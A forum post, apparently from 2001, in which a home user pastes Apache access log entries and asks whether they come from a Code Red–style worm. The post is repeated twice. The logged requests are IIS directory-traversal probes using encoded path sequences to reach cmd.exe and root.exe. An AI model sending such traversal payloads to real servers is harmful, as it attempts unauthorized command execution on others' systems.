tazmandevil
Registered
in my apache "access_log" i always have some stupid entries like that:
194.230.143.50 - - [21/Sep/2001:13:20:28 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.143.50 - - [21/Sep/2001:13:20:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
194.230.143.50 - - [21/Sep/2001:13:20:31 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:33 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:34 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:35 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:36 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:38 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
194.230.143.50 - - [21/Sep/2001:13:20:39 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:40 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:41 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:43 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:44 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:46 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.138.40 - - [22/Sep/2001:00:53:34 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.138.40 - - [22/Sep/2001:00:53:44 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
is that a virus-client, searching for a trojan of this codered thing? (good luck i don't have a PC..... it's incredible, how quick, fast and often such requests come to me!.... i don't understand how such a frequency is possible...i'm just a usual User, have no permanent server or something!.... is that going around the world on every PC?... where is it come from?)
194.230.143.50 - - [21/Sep/2001:13:20:28 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.143.50 - - [21/Sep/2001:13:20:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
194.230.143.50 - - [21/Sep/2001:13:20:31 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:33 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:34 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:35 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:36 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:38 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
194.230.143.50 - - [21/Sep/2001:13:20:39 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:40 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:41 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:43 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:44 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:46 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.138.40 - - [22/Sep/2001:00:53:34 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.138.40 - - [22/Sep/2001:00:53:44 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
is that a virus-client, searching for a trojan of this codered thing? (good luck i don't have a PC..... it's incredible, how quick, fast and often such requests come to me!.... i don't understand how such a frequency is possible...i'm just a usual User, have no permanent server or something!.... is that going around the world on every PC?... where is it come from?)